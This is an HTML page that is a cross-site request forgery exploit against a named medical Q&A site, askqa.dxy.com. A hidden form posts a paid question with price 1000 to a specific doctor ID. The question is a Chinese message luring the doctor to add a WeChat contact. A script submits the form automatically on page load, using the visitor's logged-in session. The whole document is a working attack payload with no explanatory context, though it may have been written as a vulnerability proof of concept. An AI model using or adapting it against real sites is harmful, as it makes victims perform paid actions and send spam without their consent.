<html>
<body>
<form id="csrfForm" action="https://askqa.dxy.com/user/i/question" method="post">
    <input name="doctor_user_id" value="889" />
    <input name="price" value="1000" />
    <input name="content" value="您好，你是我们选中的优质医生。我们为您提供了特殊通道。来帮助您实现更多的个人价值。请添加我的个人微信：Xxx。" />
    <input name="source" value="0" />
    <input name="source_record_time" value="1534137105888" />
    <input name="type" value="0" />
</form>
<script>
    document.getElementById("csrfForm").submit();
</script>
</body>
</html>